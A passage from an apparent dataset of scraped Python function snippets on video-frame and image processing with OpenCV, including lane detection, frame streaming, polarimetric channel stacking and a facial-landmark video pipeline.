PIL.Image.fromarray(cv2.resize(rgbFrame, (int(400 * ratio), int(400 * ratio))))\r\n layered.paste(imgFrame, (int(200 * (1 - ratio)), int(200 * (1 - ratio))))\r\n\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (200 / width)), int(200 * (1 - ratio) - focalpoint[1] * (200 / height))))\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (200 // width)), int(200 * (1 - ratio) - focalpoint[1] * (200 // height))))\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (ratio ** -1)), int(200 * (1 - ratio) - focalpoint[1] * (ratio ** -1))))\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (200/width) / ratio), int(200 * (1 - ratio) - focalpoint[1] * (200/height) / ratio)))\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (200 / width)), int(200 * (1 - ratio) - focalpoint[1] * (200 / height))))\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (ratio ** -1) / 200), int(200 * (1 - ratio) - focalpoint[1] * (ratio ** -1) / 200)))\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (400//width * (1- ratio))), int(200 * (1 - ratio) - focalpoint[1] * (400//height * (1 - ratio)))))\r\n\r\n # Paste the images together in stacked\r\n imgFrame = PIL.Image.fromarray(cv2.resize(rgbFrame, (200, 200)))\r\n stacked.paste(imgFrame, (0, 200 * i))\r\n\r\n # Add the stacked image to the canvas\r\n self._pilFrames[\"stacked\"] = PIL.ImageTk.PhotoImage(image=stacked)\r\n self._appCanvas[\"stacked\"].create_image(100, 0, image=self._pilFrames[\"stacked\"], anchor=tkinter.NW)\r\n\r\n # Add the layered image to the canvas\r\n self._pilFrames[\"layered\"] = PIL.ImageTk.PhotoImage(image=layered)\r\n self._appCanvas[\"layered\"].create_image(0, 0, image=self._pilFrames[\"layered\"], anchor=tkinter.NW)\r\n\r\n # Add the control image to the canvas\r\n imgFrame = cv2.cvtColor(self._system[self._appString[\"device\"].get()][self._appString[\"vision\"].get()][self._appString[\"frame\"].get()], cv2.COLOR_BGR2RGBA)\r\n control = PIL.Image.fromarray(cv2.resize(imgFrame, (600, 600)))\r\n self._pilFrames[\"control\"] = PIL.ImageTk.PhotoImage(image=control)\r\n self._appCanvas[\"control\"].create_image(100, 90, image=self._pilFrames[\"control\"], anchor=tkinter.NW)\r\n\r\n # Continue to update with a delay of 15\r\n self.after(15, self.update)", "def start(self):\n\t\twhile self.capture_status:\n\t\t\t_, frame = self.cap.read()\n\t\t\tc_frame = frame[self.width / 2 - self.face_width / 2: self.width / 2 + self.face_width / 2,\n\t\t\t self.height / 2 - self.face_width / 2: self.height / 2 + self.face_height / 2, :]\n\t\t\tif not self.in_processing:\n\t\t\t\tself.frame = frame\n\t\t\t\tself.in_processing = True\n\t\t\tsleep(0.2)\n\t\tyield cv2.imdecode('png', c_frame)", "def style_transfer_postprocess(preprocessed_frame: np.ndarray, image_shape: tuple):\n\n postprocessed_frame = np.squeeze(preprocessed_frame, axis=0)\n # select original height and width from image_shape\n frame_height = image_shape[0]\n frame_width = image_shape[1]\n postprocessed_frame = cv2.resize(postprocessed_frame, (frame_width, frame_height)).astype(\"float32\") * 255\n postprocessed_frame = cv2.cvtColor(postprocessed_frame, cv2.COLOR_RGB2BGR)\n\n return postprocessed_frame", "def registerDepthFrame(self, frame):\n h, w = frame.shape[:2]\n frame = cv2.warpAffine(frame,self.depth2rgb_affine,(w,h))\n\n return frame", "def pre_handler(frame):\n img_data, _im0 = preprocess(frame, IMAGE_HEIGHT, IMAGE_WIDTH, False)\n return kdp_wrapper.convert_float_to_rgba(img_data, 8, 520, True)", "def gen():\n while True:\n retval, frame = vc.read()\n\n if retval:\n #image_processing(frame)\n frame = cv2.imencode('.jpg', frame)[1].tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')", "def process_frame(self, downsize):\n # if (not hasattr(downsize,'shape')) and (not hasattr(downsize,'len')):\n # downsize = np.array(downsize)\n\n if type(downsize) != np.ndarray:\n raise TypeError\n\n if not downsize.any():\n raise ValueError\n\n if self.pre_resize:\n downsize = cv2.resize(downsize, (0, 0), fx=self.resize_factor, fy=self.resize_factor)\n\n self.frame_history.append(downsize)\n\n # Remove no longer needed frames from memory\n self.frame_history = self.frame_history[-(self.LMC_rec_depth):]\n downsize = signal.lfilter(self.b, self.a, self.frame_history, axis=0)[-1]\n\n # Center surround antagonism kernel applied.\n\n downsize = cv2.filter2D(downsize, -1, self.CSKernel)\n\n # RTC filter.\n u_pos = deepcopy(downsize)\n u_neg = deepcopy(downsize)\n u_pos[u_pos < 0] = 0\n u_neg[u_neg > 0] = 0\n u_neg = -u_neg\n\n # On first step, instead of computing just save the images.\n if self.t == self.T0:\n self.v_pos_prev = deepcopy(u_pos)\n self.v_neg_prev = deepcopy(u_neg)\n self.u_pos_prev = deepcopy(u_pos)\n self.u_neg_prev = deepcopy(u_neg)\n\n # Do everything for pos == ON.\n tau_pos = u_pos - self.u_pos_prev\n tau_pos[tau_pos >= 0] = 0.001\n tau_pos[tau_pos < 0] = 0.1\n mult_pos = self.rtc_exp(self.dt, tau_pos)\n v_pos = -(mult_pos - 1) * u_pos + mult_pos * self.v_pos_prev\n self.v_pos_prev = deepcopy(v_pos)\n\n # Do everything for neg == OFF.\n tau_neg = u_neg - self.u_neg_prev\n tau_neg[tau_neg >= 0] = 0.001\n tau_neg[tau_neg < 0] = 0.1\n mult_neg = self.rtc_exp(self.dt, tau_neg)\n v_neg = -(mult_neg - 1) * u_neg + mult_neg * self.v_neg_prev\n self.v_neg_prev = deepcopy(v_neg)\n\n # keep track of previous u.\n self.u_pos_prev = deepcopy(u_pos)\n self.u_neg_prev = deepcopy(u_neg)\n\n # Subtract v from u to give the output of each channel.\n out_pos = u_pos - v_pos\n out_neg = u_neg - v_neg\n\n # Now apply yet another filter to both parts.\n out_pos = cv2.filter2D(out_pos, -1, self.H_filter)\n out_neg = cv2.filter2D(out_neg, -1, self.H_filter)\n out_pos[out_pos < 0] = 0\n out_neg[out_neg < 0] = 0\n\n if self.t == self.T0:\n self.out_neg_prev = deepcopy(out_neg)\n\n # Delay off channel.\n out_neg = signal.lfilter(self.b1, self.a1, [self.out_neg_prev, out_neg], axis=0)[-1]\n self.out_neg_prev = out_neg\n downsize = out_neg * out_pos\n\n # Show image.\n downsize *= self.gain\n downsize = np.tanh(downsize)\n\n # Threshold.\n downsize[downsize < self.threshold] = 0\n\n if not self.pre_resize:\n downsize = cv2.resize(downsize, (0, 0), fx=self.resize_factor, fy=self.resize_factor)\n\n self.t += self.dt\n\n return downsize", "def calculate_frame(self):\n frame = self.stream.read()\n self.keypoints, self.image = self.openpose.forward(frame, True)", "def pipeline(image, plot = False):\n # undistort image\n undistorted_image = undistort_image(image)\n \n # R&S|sobel-x thresholding\n _, _, _, _, threshold_image = thresholding(undistorted_image)\n \n # yellow mask\n _, mask_yellow = filter_color(undistorted_image, np.array([20,100,100]), np.array([50,255,255]))\n \n # white mask\n _, mask_white = filter_color(undistorted_image, np.array([0,0,220]), np.array([255,35,255]))\n \n # combine yellow and white mask\n mask = cv2.bitwise_or(mask_yellow, mask_white)\n comb_image = np.zeros_like(threshold_image)\n \n # combine mask and thresholded image\n comb_image[(mask > 0)&(threshold_image == 1)] = 1\n \n # warp the binary image\n warped_image, Minv = warp(comb_image, src, dst)\n if plot:\n plt.figure(2)\n plt.imshow(warped_image, cmap = \"gray\")\n plt.title(\"Binary warped image\")\n \n # calculate polynomial fit\n left_fitx, right_fitx, ploty, left_curverad, right_curverad, offset = fit_polynomial(warped_image, plot)\n \n # superimpose lines on top of the polynomial\n superimposed_image = mark_lane_lines(undistorted_image, warped_image, ploty, left_fitx, right_fitx, Minv)\n cv2.putText(superimposed_image, \"Left curvature = \" + str(np.round(left_curverad, 2)) + \" m\",(40,40), \\\n cv2.FONT_HERSHEY_PLAIN, 2, (255,0,0), 2)\n cv2.putText(superimposed_image,\"Right curvature = \" + str(np.round(right_curverad, 2)) + \" m\",(40,80), \\\n cv2.FONT_HERSHEY_PLAIN, 2, (255,0,0), 2)\n cv2.putText(superimposed_image,\"Offset = \" + str(np.round(offset*100, 2)) + \" cm\",(40,120), \\\n cv2.FONT_HERSHEY_PLAIN, 2, (255,0,0), 2)\n \n return superimposed_image", "def process_image():\n global last_frame, is_streaming\n i=0\n\n imgproc = ImgProc()\n while(True):\n if last_frame is not None and is_streaming:\n time.sleep(0.1)\n\n print(\"Processing frame \", i)\n imgproc.detect_object(last_frame, i)\n print(\"Processing complete \", i)\n i+=1", "def captureNextFrame(self):\n ret, readFrame=self.capture.read()\n if(ret==True):\n self.currentFrame=cv2.cvtColor(readFrame,cv2.COLOR_BGR2RGB)", "def render(self, frame: Frame):\n\n cv2.imshow(winname=self.title, mat=frame)\n cv2.waitKey(delay=self.delay)\n\n if self.step:\n while cv2.waitKey(delay=0) != self.step_key:\n continue", "def draw(self, frame):\n frame[OFS:OFS+self.image.shape[0], OFS:OFS+self.image.shape[1]] = self.image", "def generate_video(head_model, tail_model, ctx_proc, n_frames, img_size, n_flow, n_block, temp=0.7, label=None):\n # lookup label embeddings as input to model\n\n image = generate_image(head_model, img_size, n_flow, n_block, 1, temp, label=label)\n frames = [image]\n state = torch.zeros(1, ctx_proc.nc_state, img_size, img_size).to(device)\n for j in range(n_frames-1):\n prev_frame = frames[-1]\n ctx=prev_frame\n if args.use_state:\n # produce new state given the previous frame\n state = ctx_proc(prev_frame, state)\n state = ctx_proc.norms[j](state) # normalize each state across all frames\n # add state to context for glow to generate from\n ctx = torch.cat([ctx, state], dim=1)\n\n frame = generate_image(tail_model, img_size, n_flow // 32, n_block, 1, temp, ctx=ctx)\n #frame = frames[-1] + delta\n frames.append(frame)\n result = torch.stack(frames, dim=1).squeeze(0)\n return result", "def stream_frames(video_capture):", "def run(self):\n while True:\n global currentFrame\n\n temp = getImageNumber(currentFrame)\n angle = getMeasurement(currentFrame) * -60\n height, width, depth = temp.shape\n newimg = cv2.resize(temp, (width * 3, height * 3))\n newimg = cv2.cvtColor(newimg, cv2.COLOR_RGB2RGBA)\n\n s_img = cv2.imread(\"up.png\", -1)\n s_img = self.rotateImage(s_img, angle)\n s_img = cv2.resize(s_img, (50,50))\n y_offset = 400\n x_offset = 50\n y1, y2 = y_offset, y_offset + s_img.shape[0]\n x1, x2 = x_offset, x_offset + s_img.shape[1]\n\n alpha_s = s_img[:, :, 3] / 255.0\n alpha_l = 1.0 - alpha_s\n\n for c in range(0, 3):\n newimg[y1:y2, x1:x2, c] = (alpha_s * s_img[:, :, c] +\n alpha_l * newimg[y1:y2, x1:x2, c])\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(newimg, str(currentFrame), (10, 50), font, 2, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.imshow('image', newimg)\n cv2.waitKey(1)", "def imaging(input_model, reference_files):\n detector = cf.Frame2D(name='detector', axes_order=(0, 1), unit=(u.pix, u.pix))\n v2v3 = cf.Frame2D(name='v2v3', axes_order=(0, 1), unit=(u.deg, u.deg))\n world = cf.CelestialFrame(reference_frame=coord.ICRS(), name='world')\n\n subarray2full = subarray_transform(input_model)\n imdistortion = imaging_distortion(input_model, reference_files)\n distortion = subarray2full | imdistortion\n distortion.bounding_box = imdistortion.bounding_box\n del imdistortion.bounding_box\n tel2sky = pointing.v23tosky(input_model)\n pipeline = [(detector, distortion),\n (v2v3, tel2sky),\n (world, None)]\n return pipeline", "def pipeline(self,img,debug=0):\n\t\timg = self.cam.undist(img)\n\t\t#get warped binary image\n\t\tbinary_warped = self.cam.warp(Image(img).binary_th())\n\t\tbw_shape = binary_warped.shape\n\t\t\n\t\tif (self.leftLine.detected == True and self.rightLine.detected == True):\n\t\t\tself.quick_search(binary_warped,debug)\n\t\telse:\n\t\t\tself.blind_search(binary_warped,debug)\n\t\n\t\tif (self.leftLine.fit!=None and self.rightLine.fit!=None):\n\t\t\tpolygon = self.fill_lane(bw_shape)\n\t\t\tunwarped_polygon = self.cam.unwarp(polygon)\n\t\t\t# calculate position of lane's center \n\t\t\ttemp = np.nonzero(unwarped_polygon[-1,:,1])[0]\n\t\t\tleft, right = temp[0], temp[-1]\n\t\t\tself.center = (int(bw_shape[1]/2) - (int((right-left)/2)+int(left)))*7.4/1280\n\t\t\timg_lines = weighted_img(unwarped_polygon,img, α=1, β=0.5, λ=0.)\n\t\t\t# write text on image\n\t\t\tfont = cv2.FONT_HERSHEY_SIMPLEX\n\t\t\ttext1 = 'Radius of Curvature: {:.0f}m'.format(np.mean((self.leftLine.radius, self.rightLine.radius)))\n\t\t\ttext2 = 'Distance is {:.2f}m {} of center'.format(abs(self.center), 'left' if self.center<0 else 'right')\n\n\t\t\tcv2.putText(img_lines, text1, (100,100), font, 1,(255,255,255),2)\n\t\t\tcv2.putText(img_lines, text2 ,(100,140), font, 1,(255,255,255),2)\n\t\t\t\n\t\t\tif (debug==1):\n\t\t\t\tshow_2gr(polygon, unwarped_polygon)\n\t\t\t\tshow_2gr(binary_warped, unwarped_polygon)\n\n\t\t\treturn img_lines\n\n\t\telse:\n\t\t\t# no lines detected and not fit available: return original image\n\t\t\t# without lines\n\t\t\treturn img", "def concatenate_frames(I, Stokes, AOP, DOP, path_process, k, imgs_polar): #, Min, Max, im_cos, im_sin, rho, phi):\n\n \"\"\"# Fusion\n im_fusion = np.zeros((500, 500, 5), dtype=int)\n im_fusion[:, :, 0] = Stokes[0]\n im_fusion[:, :, 1] = Stokes[1]\n im_fusion[:, :, 2] = Stokes[2]\n im_fusion[:, :, 3] = AOP\n im_fusion[:, :, 4] = DOP\n if not os.path.exists(path_process + \"Fusion/\"):\n os.mkdir(path_process + \"Fusion/\")\n np.save(path_process + \"Fusion/\" + imgs_polar[k].split(\".\")[0], im_fusion.astype(np.uint8))\"\"\"\n\n \"\"\"# RetinaNet intensities\n im_I04590 = np.zeros((500, 500, 3))\n im_I04590[:, :, 0] = I[0]\n im_I04590[:, :, 1] = I[1]\n im_I04590[:, :, 2] = I[2]\n if not os.path.exists(path_process + \"I04590/\"):\n os.mkdir(path_process + \"I04590/\")\n imageio.imwrite(path_process + \"I04590/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_I04590)\n\n # Min Max total intensity\n im_min_max = np.zeros((500, 500, 3))\n im_min_max[:, :, 0] = Stokes[0]\n im_min_max[:, :, 1] = Max\n im_min_max[:, :, 2] = Min\n if not os.path.exists(path_process + \"MinMax/\"):\n os.mkdir(path_process + \"MinMax/\")\n imageio.imwrite(path_process + \"MinMax/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_min_max)\n\n # Cos Sin total intensity\n im_cos_sin = np.zeros((500, 500, 3))\n im_cos_sin[:, :, 0] = Stokes[0]\n im_cos_sin[:, :, 1] = im_cos\n im_cos_sin[:, :, 2] = im_sin\n if not os.path.exists(path_process + \"CosSin/\"):\n os.mkdir(path_process + \"CosSin/\")\n imageio.imwrite(path_process + \"CosSin/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_cos_sin)\"\"\"\n\n \"\"\"# Cos Sin total intensity\n im_cos_sin = np.zeros((500, 500, 3))\n im_cos_sin[:, :, 0] = DOP\n im_cos_sin[:, :, 1] = im_cos\n im_cos_sin[:, :, 2] = im_sin\n if not os.path.exists(path_process + \"CosSin2_s/\"):\n os.mkdir(path_process + \"CosSin2_s/\")\n imageio.imwrite(path_process + \"CosSin2_s/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_cos_sin)\"\"\"\n\n\n \"\"\"im_I045135 = np.zeros((500, 500, 3))\n im_I045135[:, :, 0] = I[0]\n im_I045135[:, :, 1] = I[3]\n im_I045135[:, :, 2] = I[1]\n if not os.path.exists(path_process + \"I013545/\"):\n os.mkdir(path_process + \"I013545/\")\n imageio.imwrite(path_process + \"I013545/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_I045135)\n\n im_I090135 = np.zeros((500, 500, 3))\n im_I090135[:, :, 0] = I[0]\n im_I090135[:, :, 1] = I[2]\n im_I090135[:, :, 2] = I[3]\n if not os.path.exists(path_process + \"I090135/\"):\n os.mkdir(path_process + \"I090135/\")\n imageio.imwrite(path_process + \"I090135/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_I090135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[1]\n im_I4590135[:, :, 1] = I[2]\n im_I4590135[:, :, 2] = I[3]\n if not os.path.exists(path_process + \"I4590135/\"):\n os.mkdir(path_process + \"I4590135/\")\n imageio.imwrite(path_process + \"I4590135/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_I4590135)\n\n im_I090135 = np.zeros((500, 500, 3))\n im_I090135[:, :, 0] = I[0] - I[1]\n im_I090135[:, :, 1] = I[0]\n im_I090135[:, :, 2] = I[0] + I[1]\n if not os.path.exists(path_process + \"RetinaNet_Ieq1/\"):\n os.mkdir(path_process + \"RetinaNet_Ieq1/\")\n imageio.imwrite(path_process + \"RetinaNet_Ieq1/\" + str(k) + \".png\", im_I090135)\n\n im_I090135 = np.zeros((500, 500, 3))\n im_I090135[:, :, 0] = I[0] - I[3]\n im_I090135[:, :, 1] = I[0]\n im_I090135[:, :, 2] = I[0] + I[3]\n if not os.path.exists(path_process + \"RetinaNet_Ieq2/\"):\n os.mkdir(path_process + \"RetinaNet_Ieq2/\")\n imageio.imwrite(path_process + \"RetinaNet_Ieq2/\" + str(k) + \".png\", im_I090135)\n\n im_I090135 = np.zeros((500, 500, 3))\n im_I090135[:, :, 0] = I[1] - I[2]\n im_I090135[:, :, 1] = I[1]\n im_I090135[:, :, 2] = I[1] + I[2]\n if not os.path.exists(path_process + \"RetinaNet_Ieq3/\"):\n os.mkdir(path_process + \"RetinaNet_Ieq3/\")\n imageio.imwrite(path_process + \"RetinaNet_Ieq3/\" + str(k) + \".png\", im_I090135)\n\n im_I090135 = np.zeros((500, 500, 3))\n im_I090135[:, :, 0] = I[0]/I[1]\n im_I090135[:, :, 1] = I[0]/I[2]\n im_I090135[:, :, 2] = I[0]/I[3]\n if not os.path.exists(path_process + \"RetinaNet_Ieq4/\"):\n os.mkdir(path_process + \"RetinaNet_Ieq4/\")\n imageio.imwrite(path_process + \"RetinaNet_Ieq4/\" + str(k) + \".png\", im_I090135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[0]\n im_I4590135[:, :, 1] = I[0]/I[1]\n im_I4590135[:, :, 2] = I[0]/I[2]\n if not os.path.exists(path_process + \"RetinaNet_eq5/\"):\n os.mkdir(path_process + \"RetinaNet_eq5/\")\n imageio.imwrite(path_process + \"RetinaNet_eq5/\" + str(k) + \".png\", im_I4590135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[0]\n im_I4590135[:, :, 1] = I[0] / I[2]\n im_I4590135[:, :, 2] = I[0] / I[3]\n if not os.path.exists(path_process + \"RetinaNet_eq6/\"):\n os.mkdir(path_process + \"RetinaNet_eq6/\")\n imageio.imwrite(path_process + \"RetinaNet_eq6/\" + str(k) + \".png\", im_I4590135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[1] / I[0]\n im_I4590135[:, :, 1] = I[1] / I[2]\n im_I4590135[:, :, 2] = I[1] / I[3]\n if not os.path.exists(path_process + \"RetinaNet_eq7/\"):\n os.mkdir(path_process + \"RetinaNet_eq7/\")\n imageio.imwrite(path_process + \"RetinaNet_eq7/\" + str(k) + \".png\", im_I4590135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[2] / I[0]\n im_I4590135[:, :, 1] = I[2] / I[1]\n im_I4590135[:, :, 2] = I[2] / I[3]\n if not os.path.exists(path_process + \"RetinaNet_eq8/\"):\n os.mkdir(path_process + \"RetinaNet_eq8/\")\n imageio.imwrite(path_process + \"RetinaNet_eq8/\" + str(k) + \".png\", im_I4590135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[3] / I[0]\n im_I4590135[:, :, 1] = I[3] / I[1]\n im_I4590135[:, :, 2] = I[3] / I[2]\n if not os.path.exists(path_process + \"RetinaNet_eq9/\"):\n os.mkdir(path_process + \"RetinaNet_eq9/\")\n imageio.imwrite(path_process + \"RetinaNet_eq9/\" + str(k) + \".png\", im_I4590135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[0]/I[1]\n im_I4590135[:, :, 1] = I[0] / I[2]\n im_I4590135[:, :, 2] = DOP/255\n if not os.path.exists(path_process + \"RetinaNet_eq10/\"):\n os.mkdir(path_process + \"RetinaNet_eq10/\")\n imageio.imwrite(path_process + \"RetinaNet_eq10/\" + str(k) + \".png\", im_I4590135)\"\"\"\n\n # retinaNet Stokes\n im_Stokes = np.zeros((Stokes.shape[1], Stokes.shape[2], 3))\n im_Stokes[:, :, 0] = Stokes[0]\n im_Stokes[:, :, 1] = Stokes[1]\n im_Stokes[:, :, 2] = Stokes[2]\n if not os.path.exists(path_process + \"Stokes/\"):\n os.mkdir(path_process + \"Stokes/\")\n imageio.imwrite(path_process + \"Stokes/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_Stokes)\n \"\"\"\n\n # RetinaNet Params\n im_Params = np.zeros((500, 500, 3))\n im_Params[:, :, 0] = Stokes[0]\n im_Params[:, :, 1] = AOP\n im_Params[:, :, 2] = DOP\n if not os.path.exists(path_process + \"Params/\"):\n os.mkdir(path_process + \"Params/\")\n imageio.imwrite(path_process + \"Params/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_Params)\"\"\"\n\n \"\"\"# HSV image\n HSV = np.zeros((500, 500, 3))\n HSV[:, :, 0] = AOP / 255 * 179\n HSV[:, :, 1] = DOP\n HSV[:, :, 2] = Stokes[0]\n if not os.path.exists(path_process + \"HSV/\"):\n os.mkdir(path_process + \"HSV/\")\n imageio.imwrite(path_process + \"HSV/\" + imgs_polar[k].split(\".\")[0] + \".png\", HSV)\"\"\"\n\n \"\"\"inten = (I[0] + I[1] + I[2] + I[3]) / 2\n\n hsv = np.uint8(cv2.merge(((phi + np.pi/2)/np.pi*180,rho/np.max(rho)*255, inten/inten.max()*255)))\n if not os.path.exists(path_process + \"HSV_2/\"):\n os.mkdir(path_process + \"HSV_2/\")\n imageio.imwrite(path_process + \"HSV_2/\" + imgs_polar[k].split(\".\")[0] + \".png\", hsv)\"\"\"\n\n \"\"\"# TSV image\n TSV = np.zeros((500, 500, 3))\n TSV[:, :, 0] = AOP\n TSV[:, :, 1] = DOP\n TSV[:, :, 2] = inten / inten.max() * 255\n if not os.path.exists(path_process + \"RetinaNet_TSV/\"):\n os.mkdir(path_process + \"RetinaNet_TSV/\")\n imageio.imwrite(path_process + \"RetinaNet_TSV/\" + str(k) + \".png\", TSV)\n\n # Pauli image\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[2]\n Pauli[:, :, 1] = I[1]\n Pauli[:, :, 2] = I[0]\n if not os.path.exists(path_process + \"RetinaNet_Pauli/\"):\n os.mkdir(path_process + \"RetinaNet_Pauli/\")\n imageio.imwrite(path_process + \"RetinaNet_Pauli/\" + str(k) + \".png\", Pauli)\"\"\"\n\n \"\"\"Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0] + I[2]\n Pauli[:, :, 1] = I[1]\n Pauli[:, :, 2] = I[0] - I[2]\n if not os.path.exists(path_process + \"Pauli2/\"):\n os.mkdir(path_process + \"Pauli2/\")\n imageio.imwrite(path_process + \"Pauli2/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\"\"\"\n\n \"\"\"Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0] + I[2]\n Pauli[:, :, 1] = I[1]\n Pauli[:, :, 2] = I[0] - I[2]\n if not os.path.exists(path_process + \"Pauli2_inv/\"):\n os.mkdir(path_process + \"Pauli2_inv/\")\n imageio.imwrite(path_process + \"Pauli2_inv/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\"\"\"\n\n \"\"\"Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = Stokes[0]\n Pauli[:, :, 1] = I[1]\n Pauli[:, :, 2] = Stokes[1]\n if not os.path.exists(path_process + \"Pauli2/\"):\n os.mkdir(path_process + \"Pauli2/\")\n imageio.imwrite(path_process + \"Pauli2/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0]\n Pauli[:, :, 1] = (I[1]+I[3])/2\n Pauli[:, :, 2] = I[2]\n if not os.path.exists(path_process + \"Sinclair/\"):\n os.mkdir(path_process + \"Sinclair/\")\n imageio.imwrite(path_process + \"Sinclair/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = Stokes[0]\n Pauli[:, :, 1] = I[1] + I[3]\n Pauli[:, :, 2] = Stokes[1]\n if not os.path.exists(path_process + \"Pauli/\"):\n os.mkdir(path_process + \"Pauli/\")\n imageio.imwrite(path_process + \"Pauli/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0]\n Pauli[:, :, 1] = I[2]\n Pauli[:, :, 2] = DOP\n if not os.path.exists(path_process + \"Test/\"):\n os.mkdir(path_process + \"Test/\")\n imageio.imwrite(path_process + \"Test/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[1]\n Pauli[:, :, 1] = I[3]\n Pauli[:, :, 2] = DOP\n if not os.path.exists(path_process + \"Test1/\"):\n os.mkdir(path_process + \"Test1/\")\n imageio.imwrite(path_process + \"Test1/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0]\n Pauli[:, :, 1] = I[3]\n Pauli[:, :, 2] = DOP\n if not os.path.exists(path_process + \"Test2/\"):\n os.mkdir(path_process + \"Test2/\")\n imageio.imwrite(path_process + \"Test2/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0]\n Pauli[:, :, 1] = I[1] + I[2] - I[3]\n Pauli[:, :, 2] = DOP\n if not os.path.exists(path_process + \"Test3/\"):\n os.mkdir(path_process + \"Test3/\")\n imageio.imwrite(path_process + \"Test3/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\"\"\"\n\n \"\"\"Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[0]\n Pauli[:, :, 1] = I[1]\n Pauli[:, :, 2] = (I[0]/I[1]) #/ np.amax(I[0] / I[1]) * 255\n if not os.path.exists(path_process + \"Pauli3/\"):\n os.mkdir(path_process + \"Pauli3/\")\n imageio.imwrite(path_process + \"Pauli3/\" + imgs_polar[k].split(\".\")[0] + \".png\", Pauli)\n\n Rachel = np.zeros((500, 500, 3))\n Rachel[:, :, 0] = Stokes[0]\n Rachel[:, :, 1] = Stokes[1]\n Rachel[:, :, 2] = DOP\n if not os.path.exists(path_process + \"RetinaNet_Rachel/\"):\n os.mkdir(path_process + \"RetinaNet_Rachel/\")\n imageio.imwrite(path_process + \"RetinaNet_Rachel/\" + str(k) + \".png\", Rachel)\n\n Rachel = np.zeros((500, 500, 3))\n Rachel[:, :, 0] = I[1]\n Rachel[:, :, 1] = I[0]\n Rachel[:, :, 2] = DOP\n if not os.path.exists(path_process + \"RetinaNet_Rachel2/\"):\n os.mkdir(path_process + \"RetinaNet_Rachel2/\")\n imageio.imwrite(path_process + \"RetinaNet_Rachel2/\" + str(k) + \".png\", Rachel)\"\"\"", "def observation(self, frame):\n frame = cv2.resize(frame, (self.width, self.height), interpolation=cv2.INTER_AREA)\n return frame", "def execute_pipeline(userId, srcDir, srcName, isShinobi):\n # print(f'{userId} - {srcDir} - {srcName}')\n videoSrc = srcDir + '/' + srcName \n metaDataDict = extract_metadata(videoSrc)\n\n video_id = write_metadata(\n userId, \n srcName,\n metaDataDict[\"width\"], \n metaDataDict[\"height\"], \n metaDataDict[\"fps\"], \n metaDataDict[\"numframes\"]\n )\n \n # Splitting up \n print(\"***************** Splitting up... *****************\")\n call([\n movieToFrames, \n videoSrc, \n str(metaDataDict[\"fps\"]), \n srcDir + \"\"\"/frames%d.png\"\"\"\n ])\n \n # Processing\n shapePoints = []\n pupilPoints = []\n skullPoints = []\n print(\"Starting landmark detection...\")\n print(\"***************** Starting landmark detection... *****************\")\n for i in range(1, metaDataDict[\"numframes\"] + 1):\n imgPath = srcDir + \"/frames\" + str(i) + \".png\"\n imgDest = srcDir + \"/landmark\" + str(i) + \".png\"\n tempDict = detectLandmarks(imgPath, imgDest, isShinobi)\n shapePoints.append(tempDict[\"shape\"])\n pupilPoints.append(tempDict[\"pupils\"])\n skullPoints.append(tempDict[\"rotation\"])\n \n # Merging\n print(\"***************** Starting stiching up... *****************\")\n call([\n framesToMovie, \n str(metaDataDict[\"fps\"]), \n str(metaDataDict[\"width\"]) + \"x\" + str(metaDataDict[\"height\"]), \n str(metaDataDict[\"numframes\"]),\n srcDir + \"\"\"/landmark%d.png\"\"\", \n srcDir + \"/\" + str(userId) + '_' + srcName\n ])\n \n write_pupils(video_id, pupilPoints)\n write_landmarks(video_id, shapePoints)\n write_skull(video_id, 